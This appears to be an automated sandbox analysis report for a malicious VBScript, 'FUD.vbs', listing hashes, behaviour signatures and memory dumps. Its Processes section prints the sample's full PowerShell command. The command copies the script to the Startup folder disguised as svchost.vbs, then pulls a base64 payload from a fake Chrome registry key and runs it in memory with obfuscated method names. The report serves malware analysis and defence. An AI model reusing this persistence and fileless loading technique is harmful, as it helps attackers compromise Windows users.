Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    28/02/2025, 15:40

General

  • Target

    FUD.vbs

  • Size

    325KB

  • MD5

    d525be35ac5b7de70edb7c00529f1d83

  • SHA1

    eef5cd4c355487132d225492acdc425fb0fe606d

  • SHA256

    f9f35704de5a2355e9b8b7107613736b5501573cfb9794126867ccd73100ea98

  • SHA512

    32e399504a0669e0c83872a947cf24955489f2b3f75dae83cec2798681f4249d6bac02f861436fcbf6b8d2321045ab7fbc6c006bf33ca1402429ce799e254830

  • SSDEEP

    6144:PAbSQwEhvxxx06qUY2fVHavDdl8PI76KF51u7WJVzZF:PAbBlhqp2fZsDdlYI77BVlF

Score
6/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)

    Using powershell.exe command.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (3 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.vbs'; $roadtest = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $roadtest = -join $roadtest[-1..-$roadtest.Length];[<##>AppDomain<##>]::<##>('seaserviceurrentDomain'.replace('seaservice','C'))<##>.<##>('digeneticoad'.replace('digenetic','L'))([Convert]::FromBase64String($roadtest))<##>.<##>('estocsntryPoint'.replace('estocs','E'))<##>.<##>('Instolonoke'.replace('stolon','v'))($Null,$Null)<##>;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2400

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2400-4-0x000007FEF518E000-0x000007FEF518F000-memory.dmp (Filesize: 4KB)
  • memory/2400-5-0x000000001B650000-0x000000001B932000-memory.dmp (Filesize: 2.9MB)
  • memory/2400-6-0x0000000002910000-0x0000000002918000-memory.dmp (Filesize: 32KB)
  • memory/2400-7-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp (Filesize: 9.6MB)
  • memory/2400-8-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp (Filesize: 9.6MB)
  • memory/2400-9-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp (Filesize: 9.6MB)
  • memory/2400-10-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp (Filesize: 9.6MB)
  • memory/2400-11-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp (Filesize: 9.6MB)
  • memory/2400-12-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp (Filesize: 9.6MB)
  • memory/2400-13-0x000007FEF518E000-0x000007FEF518F000-memory.dmp (Filesize: 4KB)